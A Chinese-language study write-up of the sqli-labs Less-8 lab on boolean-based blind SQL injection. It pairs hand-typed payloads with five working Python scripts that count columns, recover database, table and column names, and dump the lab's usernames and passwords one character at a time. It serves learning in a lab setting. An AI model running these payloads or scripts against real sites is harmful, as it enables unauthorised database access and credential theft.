之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
布尔型 sql 盲注
Less-8 布尔型 SQL 盲注(单引号闭合)。页面没有数据回显,只会根据注入条件的真假显示或不显示 "You are in...",因此只能用"真/假"这一比特信息逐字符猜解。
测试
payload
?id=1'or 1=1--+
四种方法讲解:
- left()
- ascii()、substr()
- regexp
- ord()、mid()
其中:
left(string,2)='sa':string 的前两个字符为 sa
ascii(substr(string,2,1))=102:从 string 的第 2 个字符起截取 1 个字符,其 ASCII 码(十进制)为 102,即 'f'
table_name regexp '^us[a-z]':table_name 以 us 开头,且第三个字符是一个小写字母
ord(mid(string,2,1))=68:从 string 的第 2 个字符起截取 1 个字符,其 ASCII 码(十进制,不是十六进制)为 68,即 'D'。对单字节字符而言 mid()/ord() 与 substr()/ascii() 结果相同,只是换了一组函数名,可用来绕过简单的关键字过滤
猜字段数
?id=1' order by 2--+ ?id=1' order by 3--+ ?id=1' order by 4--+
运行脚本
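# -*- coding: utf-8 -*-
# filename:Less08-1 field_num.py
#
# Boolean-based blind SQLi helper for sqli-labs Less-8: count the columns of
# the injected SELECT with ORDER BY n.  The page never echoes data, so the
# only oracle is whether the "You are in" marker appears in the response.
# For use against a lab instance you are authorised to test only.
import re

# Marker the lab prints on the TRUE branch; the whole oracle hinges on it.
_ORACLE = re.compile(r"You are in")


def _default_fetch(url):
    """Fetch ``url`` with the hackhttp client and return the body as text.

    hackhttp is imported lazily so the probing logic can be run (and unit
    tested) with a stub ``fetch`` when the third-party client is absent.
    """
    import hackhttp
    hh = hackhttp.hackhttp()
    code, head, body, redirect_url, log = hh.http(url)
    if isinstance(body, bytes):  # be tolerant of a bytes body under Python 3
        body = body.decode("utf-8", "replace")
    return body


def _is_true(body):
    """Return True when the response body carries the TRUE-branch marker."""
    return _ORACLE.search(body) is not None


def field_num(arg, fetch=None, max_cols=9):
    """Return the column count of the vulnerable SELECT, or None if unknown.

    Probes ``ORDER BY 1`` .. ``ORDER BY max_cols``; the first ``n`` whose
    response lacks the TRUE marker means the query has ``n - 1`` columns.

    ``arg``      -- URL prefix ending in ``?id=`` (the payload is appended).
    ``fetch``    -- callable ``url -> body``; defaults to the hackhttp client.
    ``max_cols`` -- highest ORDER BY index tried (9, as in the original loop).

    Returns None when every probe up to ``max_cols`` is TRUE, i.e. the count
    is at least ``max_cols``; the original script silently printed
    ``max_cols - 1`` in that case, which is wrong.
    """
    fetch = fetch or _default_fetch
    print("field_num start test...")
    for j in range(1, max_cols + 1):
        # Same URL-encoded payload as the hand-typed one: 1' order by j--+
        msg = "1%27%20order%20by%20{j}--+".format(j=j)
        if not _is_true(fetch(arg + msg)):
            print("测试第%s位" % (j))
            cols = j - 1
            print("查询的字段数为: {j}".format(j=cols))
            return cols
    print("查询的字段数不少于 %s,请增大 max_cols" % max_cols)
    return None


if __name__ == '__main__':
    field_num('http://10.10.10.137/sqli-labs/Less-8/?id=')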
猜数据库名
?id=1'and left(database(),1)='s'--+ ?id=1'and left(database(),2)='se'--+ ?id=1'and left(database(),3)='sec'--+
运行脚本
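# -*- coding: utf-8 -*-
# filename:Less08-2 database_name.py
#
# Boolean-based blind SQLi helper for sqli-labs Less-8: recover the current
# database name one character at a time with left(database(), k) = 'prefix'.
# For use against a lab instance you are authorised to test only.
import re

# Marker the lab prints on the TRUE branch; the whole oracle hinges on it.
_ORACLE = re.compile(r"You are in")

# Characters tried at each position.  The original only tried a-z; digits and
# underscore are legal in MySQL schema names, so they are included too.
_CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"


def _default_fetch(url):
    """Fetch ``url`` with the hackhttp client and return the body as text.

    hackhttp is imported lazily so the probing logic can be run (and unit
    tested) with a stub ``fetch`` when the third-party client is absent.
    """
    import hackhttp
    hh = hackhttp.hackhttp()
    code, head, body, redirect_url, log = hh.http(url)
    if isinstance(body, bytes):  # be tolerant of a bytes body under Python 3
        body = body.decode("utf-8", "replace")
    return body


def _is_true(body):
    """Return True when the response body carries the TRUE-branch marker."""
    return _ORACLE.search(body) is not None


def database_name(arg, fetch=None, max_len=19, charset=_CHARSET):
    """Return the name of the current database, recovered character by character.

    For position ``k`` = 1..``max_len`` every ``c`` in ``charset`` is tested
    with ``left(database(), k) = '<prefix><c>'``; the first TRUE extends the
    prefix.  A position where nothing matches ends the search: either the
    name is complete (left() then returns the whole, shorter name) or it
    contains a character outside ``charset``.

    ``arg``     -- URL prefix ending in ``?id=`` (the payload is appended).
    ``fetch``   -- callable ``url -> body``; defaults to the hackhttp client.
    ``max_len`` -- longest name considered (19, as in the original loops).

    Fixes versus the original: the success branch now breaks out of the
    character loop (it kept sending 26 more requests per position), the
    progress message no longer prints the matched character twice, and an
    empty first position returns "" instead of raising NameError.
    """
    fetch = fetch or _default_fetch
    print("database_name start test...")
    name = ""
    for k in range(1, max_len + 1):
        for c in charset:
            candidate = name + c
            # Identical bytes to the original payload: 1'and left(database(),k)='...'--+
            msg = "1%27and%20left(database(),{k})=%27{i}%27--+".format(k=k, i=candidate)
            if _is_true(fetch(arg + msg)):
                name = candidate
                print("数据库的前段部分是%s" % (name))
                break
        else:
            break  # no character matched at position k: name complete
    print("数据库名为: {i}".format(i=name))
    return name


if __name__ == '__main__':
    database_name('http://10.10.10.137/sqli-labs/Less-8/?id=')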
猜表名
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101--+
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109--+
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),3,1))=97--+
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114--+
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=101--+
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),3,1))=102--+
结果为: emails referers uagents users(limit 0,1 取第一张表 emails:101='e'、109='m'、97='a';limit 1,1 取第二张表 referers:114='r'、101='e'、102='f',依此类推)
运行脚本
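# -*- coding: utf-8 -*-
# filename:Less08-3 table_name.py
#
# Boolean-based blind SQLi helper for sqli-labs Less-8: enumerate the tables
# of a schema via information_schema.tables, one ASCII code at a time with
# ascii(substr(..., i, 1)) = j.
# For use against a lab instance you are authorised to test only.
import re

# Marker the lab prints on the TRUE branch; the whole oracle hinges on it.
_ORACLE = re.compile(r"You are in")

# ASCII codes tried at each position: '0'..'z' (48..122).  The original used
# range(65, 122), which skipped digits and, being exclusive, the letter 'z'.
_CODES = tuple(range(48, 123))

# Identical to the hand-typed payload except that the schema is a parameter.
_TEMPLATE = (
    "1%27%20and%20ascii(substr((select%20table_name%20from%20"
    "information_schema.tables%20where%20table_schema=%27{s}%27"
    "%20limit%20{k},1),{i},1))={j}--+"
)


def _default_fetch(url):
    """Fetch ``url`` with the hackhttp client and return the body as text.

    hackhttp is imported lazily so the probing logic can be run (and unit
    tested) with a stub ``fetch`` when the third-party client is absent.
    """
    import hackhttp
    hh = hackhttp.hackhttp()
    code, head, body, redirect_url, log = hh.http(url)
    if isinstance(body, bytes):  # be tolerant of a bytes body under Python 3
        body = body.decode("utf-8", "replace")
    return body


def _is_true(body):
    """Return True when the response body carries the TRUE-branch marker."""
    return _ORACLE.search(body) is not None


def table_name(arg, schema='security', fetch=None, max_tables=5, max_len=32,
               codes=_CODES):
    """Return the list of table names in ``schema``, in LIMIT offset order.

    Table ``k`` (``limit k,1``) is read position by position; the first code
    in ``codes`` for which the oracle is TRUE is the character at that
    position.  A position with no match ends the name (substr past the end
    yields '' whose ascii() is 0), and an empty first position means there is
    no table at offset ``k``, which ends the enumeration early instead of
    burning ``max_len * len(codes)`` requests per missing table.

    ``arg``        -- URL prefix ending in ``?id=`` (the payload is appended).
    ``schema``     -- table_schema value to enumerate (default 'security').
    ``fetch``      -- callable ``url -> body``; defaults to the hackhttp client.
    ``max_tables`` -- highest LIMIT offset tried (5, as in the original).
    ``max_len``    -- longest table name read; longer names are truncated.
    """
    fetch = fetch or _default_fetch
    print("table_name start test...")
    names = []
    for k in range(max_tables):
        current = ""
        for i in range(1, max_len + 1):
            for j in codes:
                msg = _TEMPLATE.format(s=schema, k=k, i=i, j=j)
                if _is_true(fetch(arg + msg)):
                    current += chr(j)
                    print("第%s个表的第%s位的ASCII码值是%s" % (k + 1, i, j))
                    break
            else:
                break  # nothing matched at position i: name ended
        if not current:
            break  # no table at offset k: enumeration complete
        names.append(current)
    print("%s 数据库的表名为: %s" % (schema, " ".join(names)))
    return names


if __name__ == '__main__':
    table_name('http://10.10.10.137/sqli-labs/Less-8/?id=')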
猜列名
?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^u' limit 0,1)--+
?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us' limit 0,1)--+
?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^use' limit 0,1)--+
?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)--+
结果为 id last password username。注意这种写法只判断"是否存在以某前缀开头的列"(子查询有行则 1=1 为真),并不能直接取出第 k 列,所以要靠前缀逐字符延伸来把列名猜完整;想确认前缀本身就是完整列名,可用 regexp '^username$' 加上结尾锚点。
运行脚本
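# -*- coding: utf-8 -*-
# filename:Less08-4 column_name.py
#
# Boolean-based blind SQLi helper for sqli-labs Less-8: enumerate the columns
# of a table via information_schema.columns and a REGEXP prefix oracle.
# For use against a lab instance you are authorised to test only.
import re

# Marker the lab prints on the TRUE branch; the whole oracle hinges on it.
_ORACLE = re.compile(r"You are in")

# Characters tried when extending a prefix.  None of them is a regex
# metacharacter, so they can be dropped into the pattern unescaped.
_CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"

# Same shape as the hand-typed payload.  The subquery only answers "does any
# column of `table` match `^pattern`?", so LIMIT 0,1 is all that is needed;
# the original varied the LIMIT offset per column, which does not select the
# k-th column but merely asks whether at least k+1 columns share the prefix.
# NOTE(review): there is no table_schema filter, so a same-named table in
# another schema would also contribute matches -- confirm against the lab.
_TEMPLATE = (
    "1%27%20and%201=(select%201%20from%20information_schema.columns%20where"
    "%20table_name=%27{t}%27%20and%20column_name%20regexp%20%27%5e{p}%27"
    "%20limit%200,1)--+"
)


def _default_fetch(url):
    """Fetch ``url`` with the hackhttp client and return the body as text.

    hackhttp is imported lazily so the probing logic can be run (and unit
    tested) with a stub ``fetch`` when the third-party client is absent.
    """
    import hackhttp
    hh = hackhttp.hackhttp()
    code, head, body, redirect_url, log = hh.http(url)
    if isinstance(body, bytes):  # be tolerant of a bytes body under Python 3
        body = body.decode("utf-8", "replace")
    return body


def _is_true(body):
    """Return True when the response body carries the TRUE-branch marker."""
    return _ORACLE.search(body) is not None


def column_name(arg, table='users', fetch=None, charset=_CHARSET):
    """Return the column names of ``table``, sorted, found by prefix search.

    The oracle can only say whether *some* column starts with a pattern, so
    the names are recovered as a depth-first walk over prefixes: from each
    known prefix every ``c`` in ``charset`` is tried as ``^prefix c``; a TRUE
    answer adds ``prefix + c`` to the work list.  A prefix is itself a column
    name when ``^prefix$`` (both anchors) is TRUE.  The walk visits children
    alphabetically, so the result comes back in lexicographic order.

    ``arg``     -- URL prefix ending in ``?id=`` (the payload is appended).
    ``table``   -- table_name value to enumerate (default 'users').
    ``fetch``   -- callable ``url -> body``; defaults to the hackhttp client.
    ``charset`` -- characters tried at each extension step.

    Cost is ``len(charset) + 1`` requests per prefix node; a column whose
    name contains a character outside ``charset`` is not found.
    """
    fetch = fetch or _default_fetch
    print("column_name start test...")

    def exists(pattern):
        return _is_true(fetch(arg + _TEMPLATE.format(t=table, p=pattern)))

    found = []
    pending = [""]
    while pending:
        prefix = pending.pop()
        if prefix and exists(prefix + "$"):
            print("列名: %s" % prefix)
            found.append(prefix)
        # push in reverse so that pop() explores the children alphabetically
        for c in reversed(charset):
            if exists(prefix + c):
                pending.append(prefix + c)
    print(" | ".join(found))
    return found


if __name__ == '__main__':
    column_name('http://10.10.10.137/sqli-labs/Less-8/?id=')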
猜数据
ifnull(expr1,expr2),含义是:如果第一个参数不为空,则返回第一个参数,否则返回第二个参数。
cast(字段名 as 转换的类型):把列值统一转成字符串再截取。示例:?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68--+,判断第一行 username 的首字符 ASCII 码是否为 68('D');ifnull(...,0x20) 把 NULL 替换成空格,避免 mid()/ord() 对 NULL 返回 NULL 而永远为假。
结果为:
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin。注意:脚本只在 ASCII 65~121 之间枚举(不含数字、大部分标点,也不含 'z'),且每个值最多取 9 位,遇到范围外的字符会直接跳过该位继续下一位,所以 Ikillyo、pssword、moble 这类结果是丢了字符的,不能当作真实数据;要拿到完整值需把枚举范围扩到可打印 ASCII(32~126)并按"某一位无匹配即结束"来判断长度。
运行脚本
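# -*- coding: utf-8 -*-
# filename:Less08-5 data.py
#
# Boolean-based blind SQLi helper for sqli-labs Less-8: dump column values of
# security.users row by row, one ASCII code at a time with ord(mid(...)) = j.
# For use against a lab instance you are authorised to test only.
import re

# Marker the lab prints on the TRUE branch; the whole oracle hinges on it.
_ORACLE = re.compile(r"You are in")

# Printable ASCII (32..126).  The original used range(65, 122), which skipped
# digits, punctuation and even 'z', silently dropping those characters from
# every recovered password.
_CODES = tuple(range(32, 127))

# Identical to the hand-typed payload except that the table is a parameter.
# ifnull(..., 0x20) turns a NULL value into a single space so that mid()/ord()
# do not return NULL (which would never compare TRUE).
_TEMPLATE = (
    "1%27%20and%20ord(mid((select%20ifnull(cast({k}%20as%20char),0x20)from%20"
    "{t}%20order%20by%20id%20limit%20{x},1),{i},1))={j}--+"
)


def _default_fetch(url):
    """Fetch ``url`` with the hackhttp client and return the body as text.

    hackhttp is imported lazily so the probing logic can be run (and unit
    tested) with a stub ``fetch`` when the third-party client is absent.
    """
    import hackhttp
    hh = hackhttp.hackhttp()
    code, head, body, redirect_url, log = hh.http(url)
    if isinstance(body, bytes):  # be tolerant of a bytes body under Python 3
        body = body.decode("utf-8", "replace")
    return body


def _is_true(body):
    """Return True when the response body carries the TRUE-branch marker."""
    return _ORACLE.search(body) is not None


def data(arg, fetch=None, columns=("username", "password"),
         table="security.users", max_rows=10, max_len=32, codes=_CODES):
    """Return ``{column: [value of row 0, row 1, ...]}`` for ``columns``.

    Each value is read position by position: the first code in ``codes`` for
    which the oracle is TRUE is the character there.  A position with no
    match ends the value (mid() past the end yields '' and ord('') is 0), and
    an empty first position means ``limit x,1`` returned no row, which ends
    that column instead of spending ``max_len * len(codes)`` requests per
    missing row.

    ``arg``      -- URL prefix ending in ``?id=`` (the payload is appended).
    ``fetch``    -- callable ``url -> body``; defaults to the hackhttp client.
    ``columns``  -- column names to dump, in order.
    ``table``    -- schema-qualified table (default 'security.users').
    ``max_rows`` -- highest LIMIT offset tried (10, as in the original).
    ``max_len``  -- longest value read; longer values are truncated.

    Caveats: a value that is the empty string '' looks like a missing row
    and stops the column early, and a multi-byte character makes ord()
    return a value above 255 that is never in ``codes``, truncating the
    value at that point.
    """
    fetch = fetch or _default_fetch
    print("data start test...")
    result = {}
    for k in columns:
        values = []
        for x in range(max_rows):
            value = ""
            for i in range(1, max_len + 1):
                for j in codes:
                    msg = _TEMPLATE.format(k=k, t=table, x=x, i=i, j=j)
                    if _is_true(fetch(arg + msg)):
                        value += chr(j)
                        print("%s列的第%s个数据的第%s位的ASCII码值是%s" % (k, x + 1, i, j))
                        break
                else:
                    break  # nothing matched at position i: value ended
            if not value:
                break  # no row at offset x: this column is done
            values.append(value)
        result[k] = values
        print("%s: %s" % (k, "\t".join(values)))
    return result


if __name__ == '__main__':
    data('http://10.10.10.137/sqli-labs/Less-8/?id=')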